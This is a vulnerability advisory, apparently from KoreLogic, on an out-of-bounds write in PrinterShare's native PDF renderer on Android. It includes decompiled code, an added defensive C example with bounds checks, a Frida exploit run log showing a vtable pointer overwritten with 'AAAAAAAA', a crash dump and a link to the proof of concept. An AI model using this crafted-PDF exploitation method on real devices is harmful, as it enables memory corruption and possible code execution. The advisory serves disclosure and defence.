Affected Systems
Discovered By
Vulnerability Details
Vulnerability Description
An out-of-bounds write occurs when the native library attempts PDF rendering; it can be exploited to achieve memory corruption and potentially arbitrary code execution.
Technical Description
- Performed on Android 13 aarch64 on a rooted Samsung Galaxy Tab A7 Lite.
- Using the Frida client on Ubuntu 24.04 LTS, with the Frida server running on the rooted Samsung device.
- Play Store location: https://play.google.com/store/apps/details?id=com.dynamixsoftware.printershare&hl=en-US
- The target Activity is exported (android:exported="true"), which means any application may interact with it, provided the required permissions are granted.
The ActivityPrintDocuments class processes PDF files through JNI calls to native libraries. The vulnerability exists in the native component (libpdfrender.so) that handles PDF rendering and can be triggered when processing PDF files with manipulated dimensions and structure.
The vulnerability is accessible through the ActivityPrintDocuments class, which is launched when opening a PDF file.
The PDF rendering happens in class j (subclass of h), which calls the vulnerable native function:

    // From activityprintdocuments.java
    class j extends h {
        @Override
        public void a(Canvas canvas, boolean z2) {
            // ...
            int drawPage = PDFrender.drawPage(this.f5155a, iArr, fArr2, i3, bitmap);
            // ...
        }
    }
The shared object function performs memory operations without proper validation, allowing attackers to manipulate memory via crafted inputs.

    undefined8 entry(long base_addr, int flag, char option) {
        // ...
        temp_long = *(long *)(base_addr + 0x90);
        *(undefined4 *)(temp_long + 0x18) = 0;
        // ... [Insufficient bounds checking on pointers]
        *(undefined8 *)(temp_long + 0x28) = 0;
        *(undefined8 *)(temp_long + 0x20) = 0;
        *(ulong *)(temp_long + 0x10) = temp_ulong;
        // ...
    }
The Frida script hooks critical native functions in libpdfrender.so, particularly targeting Java_com_dynamixsoftware_printershare_PDFrender_drawPage. It creates a malformed PDF with extreme dimensions (values of 0x7FFFFFFF, i.e. INT_MAX) designed to trigger buffer overflows. When the drawPage native function is called with these corrupted parameters, memory corruption results.
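The two preceding passages describe the root cause from both sides: a native renderer that sizes and writes page memory without validating its inputs, and a PDF whose dimensions are set to INT_MAX. The following C is an added example written for this advisory; it is not code from PrinterShare or libpdfrender.so, and the function names, the MAX_PAGE_DIM limit and the ARGB_8888 pixel size are assumptions chosen for illustration. It shows why INT_MAX dimensions are dangerous (a 32-bit width*height*4 product wraps to a tiny value) and the overflow-safe validation a renderer should apply at the JNI boundary before touching the destination bitmap.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Hypothetical limits for the example (not values from the advisory). */
#define MAX_PAGE_DIM    20000u   /* upper bound on page width/height in pixels */
#define BYTES_PER_PIXEL 4u       /* ARGB_8888 */

/* The unsafe pattern: a 32-bit product of attacker-controlled dimensions.
 * For width = height = INT32_MAX the product wraps to 1, so the "size"
 * becomes 4 bytes while the caller still believes it holds a full page. */
uint32_t naive_buffer_size(int32_t width, int32_t height)
{
    return (uint32_t)width * (uint32_t)height * BYTES_PER_PIXEL;
}

/* The hardened form: range-check the dimensions, then compute the size in
 * size_t with explicit overflow checks.  Returns 0 and writes *out on
 * success, -1 if the dimensions are rejected. */
int safe_render_buffer_size(int32_t width, int32_t height, size_t *out)
{
    if (out == NULL) return -1;
    if (width <= 0 || height <= 0) return -1;                      /* no zero/negative pages */
    if ((uint32_t)width > MAX_PAGE_DIM || (uint32_t)height > MAX_PAGE_DIM) return -1;

    size_t w = (size_t)width, h = (size_t)height;
    if (w > SIZE_MAX / BYTES_PER_PIXEL) return -1;                 /* stride overflow */
    size_t stride = w * BYTES_PER_PIXEL;
    if (h > SIZE_MAX / stride) return -1;                          /* total overflow */
    *out = stride * h;
    return 0;
}

/* Hypothetical JNI-side guard for a drawPage-style entry point: refuse to
 * render unless the bitmap handed over by the Java side can hold the page.
 * Returns 0 on success, -1 when the input is rejected.  The "rendering"
 * here only clears the destination, which is enough to show the bound. */
int draw_page_checked(int32_t width, int32_t height,
                      uint8_t *bitmap, size_t bitmap_len)
{
    size_t need = 0;
    if (bitmap == NULL) return -1;
    if (safe_render_buffer_size(width, height, &need) != 0) return -1;
    if (need > bitmap_len) return -1;                              /* would write out of bounds */
    for (size_t i = 0; i < need; i++) bitmap[i] = 0;
    return 0;
}

int main(void)
{
    size_t need = 0;
    uint8_t bitmap[64];

    printf("naive size for INT_MAX x INT_MAX: %u bytes\n",
           naive_buffer_size(INT32_MAX, INT32_MAX));
    printf("safe check for INT_MAX x INT_MAX: %s\n",
           safe_render_buffer_size(INT32_MAX, INT32_MAX, &need) == 0 ? "accepted" : "rejected");
    printf("draw 4x4 into 64-byte bitmap: %s\n",
           draw_page_checked(4, 4, bitmap, sizeof bitmap) == 0 ? "ok" : "rejected");
    printf("draw 4x5 into 64-byte bitmap: %s\n",
           draw_page_checked(4, 5, bitmap, sizeof bitmap) == 0 ? "ok" : "rejected");
    return 0;
}
```

The key design point is that the size computation and the capacity check happen once, in native code, on the values the Java layer passes in: the decompiled routine above trusts pointers derived from the parsed PDF, whereas here nothing is written until the required size has been shown to fit the buffer that actually exists.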
$ frida -U -f com.dynamixsoftware.printershare -l exploit.js
____
/ _ | Frida 16.6.5 - A world-class dynamic instrumentation toolkit
| (_| |
> _ | Commands:
/_/ |_| help -> Displays the help system
. . . . object? -> Display information about 'object'
. . . . exit/quit -> Exit
. . . .
. . . . More info at https://frida.re/docs/home/
. . . .
. . . . Connected to SM T220 (id=R83X10JATAV)
Spawning `com.dynamixsoftware.printershare`...
Spawned `com.dynamixsoftware.printershare`. Resuming main thread!
[SM T220::com.dynamixsoftware.printershare ]-> [!] Terminal exploitation initialized
[!] Initiating terminal exploit sequence
[*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run
[*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$h.a
[*] Hooking method: com.dynamixsoftware.printershare.ActivityPrintDocuments$j.a
[!] Creating terminal exploit PDF
[+] Using existing exploit PDF
[!] Launching with payload at /sdcard/Download/terminal_exploit.pdf
[!] Called com.dynamixsoftware.printershare.ActivityPrintDocuments$g.run
[+] Found libpdfrender.so at 0x75521e4000
[!] Found critical function pointer: 0x75521e4e98
...SNIP...
[!] Target function called
[*] Original pageNum: 0x76b5496bc0
[-] Error modifying dimensions: Error: access violation accessing 0x0
[*] Flags changed: 0 -> 2065
[!] Called critical function: 0xb4000075790586a0
[*] Potential vtable: 0xb4000075790586a0 -> 0x762801f5a0
[!] Overwrote potential vtable with "AAAAAAAA"
[!] MEMORY MODIFIED at 0xb4000075790586a0 (vtable pointer):
BEFORE:
00000000 a0 f5 01 28 76 00 00 00 ...(v...
AFTER:
00000000 00 40 41 41 41 41 41 41 .@AAAAAA
[!] Corrupted 64-byte memory chunk starting at object
[!] MEMORY MODIFIED at 0xb4000075790586a0 (object memory):
BEFORE:
00000000 00 40 41 41 41 41 41 41 00 b8 e3 78 75 00 00 b4 .@AAAAAA...xu...
00000010 80 03 e9 29 76 00 00 b4 00 00 00 00 00 00 00 00 ...)v...........
00000020 80 00 00 00 fc ff ff ff 00 fe 3f d0 76 00 00 00 ..........?.v...
00000030 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
AFTER:
00000000 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA
00000010 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA
00000020 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA
00000030 00 40 41 41 41 41 41 41 00 40 41 41 41 41 41 41 .@AAAAAA.@AAAAAA
[!] Target function returned: 0xffffffff
[-] Post-function corruption error: Error: invalid operation
Process crashed: Bad access due to invalid address
***
*** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
Build fingerprint: 'samsung/gta7litewifixx/gta7litewifi:13/TP1A.220624.014/T220XXS6CWL2:user/release-keys'
Revision: '0'
ABI: 'arm64'
Processor: '4'
Timestamp: 2025-03-03 09:31:59.556177436-0800
Process uptime: 4s
Cmdline: com.dynamixsoftware.printershare
pid: 31838, tid: 32000, name: Thread-17 >>> com.dynamixsoftware.printershare <<<
uid: 10243
signal 11 (SIGSEGV), code 1 (SEGV_MAPERR), fault addr 0x0041414141414000
x0 b4000075790586a0 x1 0000000000000003 x2 0000000000000000 x3 0000000000000000
x4 0000000000000000 x5 0000000000000000 x6 0000000000000000 x7 0000000000000000
x8 0000000000004200 x9 0000007627bdd114 x10 0000007553d43d50 x11 0000007553d43cd0
x12 0000000000000008 x13 00000076c4d36f78 x14 0000000000000010 x15 00000076d2300a00
x16 000000761084cf48 x17 00000076cd911f30 x18 0000000000000000 x19 0000000000000003
x20 b4000075790586a0 x21 4141414141414000 x22 000000760f393a40 x23 0000007553d47000
x24 0000000000000010 x25 00000076d22fe840 x26 0000000000000002 x27 0000007553d43ed0
x28 0000000000000010 x29 0000007553d43d40
lr 000000760fb92440 sp 0000007553d43d00 pc 0000007627bdd168 pst 0000000060000000
...SNIP...
Mitigation and Remediation Recommendation
No response from vendor. There are no known mitigations to end-users of the affected application versions.
Credit
This vulnerability was discovered by Felix Segoviano of KoreLogic, Inc.
Proof of Concept
URL: https://www.korelogic.com/advisories/KL-001-2025-004.poc.js.txt
SHA256sum: 8f1df24eb0027d8bfc13092988839c5f8a3fb39a57912d338af719b23d253b2c
The contents of this advisory are copyright (c) 2025 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/
KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html
Our public vulnerability disclosure policy is available at: https://korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy
Disclosure Timeline
KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.
KoreLogic requests security contact from vendor via {info,support}@mobiledynamix.com.
KoreLogic submits vulnerability details to vendor via {info,support}@mobiledynamix.com.
KoreLogic public disclosure.
Responsible Disclosure
KoreLogic follows responsible disclosure practices. All vulnerabilities are reported to affected vendors with appropriate time for remediation before public disclosure.